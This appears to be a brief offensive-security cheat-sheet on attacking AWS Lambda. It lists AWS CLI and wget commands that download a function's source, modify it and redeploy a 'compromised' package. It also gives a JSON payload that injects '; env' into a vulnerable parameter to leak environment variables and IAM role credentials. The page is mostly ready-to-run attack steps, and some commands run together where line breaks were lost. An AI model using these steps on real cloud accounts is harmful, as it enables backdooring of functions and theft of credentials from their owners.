Code Injection
Upload malicious code
wget $(aws lambda get-function --function-name "<function>" --query Code.Location --output text) -O "./source.zip"
mkdir dump
unzip "source.zip" -d ./dump
cd dump
<edit the source code>
zip -r ../compromised.zip ./*aws lambda update-function-code --region <region> --function-name <function> --zip-file fileb://compromised.zipaws lambda invoke --function-name <function> output.jsonaws lambda invoke --function-name <function> --payload fileb://<path>.json output.jsonRCE to IAM Role Compromise
{
"<vunerable param>": " ; env "
}Last updated